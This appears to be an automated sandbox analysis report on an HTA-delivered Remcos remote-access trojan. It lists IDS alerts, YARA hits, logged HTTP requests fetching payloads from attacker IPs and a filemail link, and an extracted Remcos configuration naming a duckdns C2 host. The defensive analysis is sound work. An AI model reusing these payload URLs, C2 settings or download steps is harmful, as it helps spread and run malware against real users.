                    2024-11-26T09:46:43.329673+010020365941Malware Command and Control Activity Detected192.168.2.449929192.169.69.2614645TCP
                    2024-11-26T09:46:54.967037+010020365941Malware Command and Control Activity Detected192.168.2.449955192.169.69.2614645TCP
                    2024-11-26T09:47:06.569998+010020365941Malware Command and Control Activity Detected192.168.2.449980192.169.69.2614645TCP
                    2024-11-26T09:47:18.496446+010020365941Malware Command and Control Activity Detected192.168.2.450007192.169.69.2614645TCP
                    2024-11-26T09:47:30.019357+010020365941Malware Command and Control Activity Detected192.168.2.450018192.169.69.2614645TCP
                    2024-11-26T09:47:41.573419+010020365941Malware Command and Control Activity Detected192.168.2.450019192.169.69.2614645TCP
                    2024-11-26T09:47:53.017292+010020365941Malware Command and Control Activity Detected192.168.2.450020192.169.69.2614645TCP
                    2024-11-26T09:48:04.494276+010020365941Malware Command and Control Activity Detected192.168.2.450021192.169.69.2614645TCP
                    2024-11-26T09:48:16.066157+010020365941Malware Command and Control Activity Detected192.168.2.450022192.169.69.2614645TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-26T09:44:13.870876+010020576351A Network Trojan was detected104.168.46.2680192.168.2.449738TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-26T09:44:29.901520+010020490381A Network Trojan was detected193.30.119.205443192.168.2.449731TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-26T09:44:13.870876+010028582951A Network Trojan was detected104.168.46.2680192.168.2.449738TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-26T09:44:17.456994+010028587951A Network Trojan was detected192.168.2.449730104.168.46.2680TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: http://104.168.46.26/1422/bestofthingswithentiretimegivenebstthignstodowithgreat.tIFAvira URL Cloud: Label: malware
                    Source: nextnewupdationsforu.duckdns.orgAvira URL Cloud: Label: malware
                    Source: 0000000D.00000002.4110277483.0000000000E47000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["nextnewupdationsforu.duckdns.org:14645:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-EC111K", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                    Source: sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.htaReversingLabs: Detection: 21%
                    Source: Yara matchFile source: 13.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.4110277483.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8032, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5480, type: MEMORYSTR
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,13_2_0043293A
                    Source: powershell.exe, 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_62091fbc-1

                    Exploits

                    barindex
                    Source: Yara matchFile source: 13.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8032, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5480, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00406764 _wcslen,CoGetObject,13_2_00406764

                    Phishing

                    barindex
                    Source: Yara matchFile source: sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta, type: SAMPLE
                    Source: unknownHTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.4:49731 version: TLS 1.2
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1711723967.000000000754A000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000009.00000002.2098398956.0000000006EB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2099153712.000000000742A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype source: powershell.exe, 00000009.00000002.2098398956.0000000006EB0000.00000004.00000800.00020000.00000000.sd
                    Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.pdb source: powershell.exe, 00000001.00000002.1818550362.0000000004BE5000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1713731202.00000000084D2000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000009.00000002.2098398956.0000000006EB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2099153712.000000000742A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000009.00000002.2099153712.000000000742A000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,13_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,13_2_0041B42F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,13_2_0040B53A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,13_2_004089A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00406AC2 FindFirstFileW,FindNextFileW,13_2_00406AC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,13_2_00407A8C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,13_2_00418C69
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,13_2_00408DA7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,13_2_00406F06

                    Software Vulnerabilities

                    barindex
                    Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.4:49730 -> 104.168.46.26:80
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49740 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49739 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 104.168.46.26:80 -> 192.168.2.4:49738
                    Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 104.168.46.26:80 -> 192.168.2.4:49738
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49769 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49743 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49795 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49821 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49850 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49876 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49904 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49929 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49955 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49980 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50019 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50018 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50020 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50007 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50022 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50021 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 104.168.46.26:80 -> 192.168.2.4:49738
                    Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 104.168.46.26:80 -> 192.168.2.4:49738
                    Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 193.30.119.205:443 -> 192.168.2.4:49731
                    Source: Malware configuration extractorURLs: nextnewupdationsforu.duckdns.org
                    Source: unknownDNS query: name: nextnewupdationsforu.duckdns.org
                    Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1Host: 3105.filemail.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /1422/RFGVGF.txt HTTP/1.1Host: 104.168.46.26Connection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 193.30.119.205 193.30.119.205
                    Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
                    Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
                    Source: Joe Sandbox ViewASN Name: DFNVereinzurFoerderungeinesDeutschenForschungsnetzese DFNVereinzurFoerderungeinesDeutschenForschungsnetzese
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: global trafficHTTP traffic detected: GET /1422/bestofthingswithentiretimegivenebstthignstodowithgreat.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 104.168.46.26Connection: Keep-Alive
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004260F7 recv,13_2_004260F7
                    Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1Host: 3105.filemail.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /1422/bestofthingswithentiretimegivenebstthignstodowithgreat.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 104.168.46.26Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /1422/RFGVGF.txt HTTP/1.1Host: 104.168.46.26Connection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: 3105.filemail.com
                    Source: global trafficDNS traffic detected: DNS query: nextnewupdationsforu.duckdns.org
                    Source: powershell.exe, 00000001.00000002.1818550362.0000000004B6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.168.46.26/1422/bestof
                    Source: powershell.exe, 00000001.00000002.1818550362.0000000004B6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1829521422.0000000007F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.46.26/1422/bestofthingswithentiretimegivenebstthignstodowithgreat.tIF
                    Source: powershell.exe, 00000001.00000002.1816371508.0000000000A88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.46.26/1422/bestofthingswithentiretimegivenebstthignstodowithgreat.tIFP
                    Source: powershell.exe, 00000003.00000002.1706219573.0000000002F20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2473025138.0000000003386000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                    Source: CasPol.exeString found in binary or memory: http://geoplugin.net/json.gp
                    Source: powershell.exe, 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: powershell.exe, 00000003.00000002.1707345310.0000000005314000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                    Source: powershell.exe, 00000001.00000002.1824468427.000000000582C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1709635524.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000009.00000002.2047488224.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000003.00000002.1707345310.0000000004F86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000001.00000002.1818550362.00000000047C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1707345310.0000000004E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2476132425.000000000514A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2047488224.0000000004C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000003.00000002.1707345310.0000000004F86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000009.00000002.2047488224.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000007.00000002.2469026614.00000000031B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.co
                    Source: powershell.exe, 00000009.00000002.2047488224.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.com
                    Source: powershell.exe, 00000009.00000002.2099410808.000000000746F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2100899330.0000000007541000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2047488224.0000000004C61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2047488224.0000000004DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2046886997.0000000002F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.com/api/file/
                    Source: powershell.exe, 00000009.00000002.2047488224.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNd
                    Source: powershell.exe, 00000009.00000002.2099410808.0000000007496000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://3105.filemailQ
                    Source: powershell.exe, 00000001.00000002.1818550362.00000000047C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1707345310.0000000004E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2476132425.000000000511A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2476132425.000000000512B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2047488224.0000000004C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                    Source: powershell.exe, 00000003.00000002.1707345310.0000000004F86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                    Source: powershell.exe, 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000009.00000002.2047488224.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000001.00000002.1818550362.0000000004EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: powershell.exe, 00000001.00000002.1829521422.0000000007F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                    Source: powershell.exe, 00000001.00000002.1824468427.000000000582C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1709635524.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownHTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.4:49731 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004099E4 SetWindowsHookExA 0000000D,004099D0,0000000013_2_004099E4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,13_2_004159C6
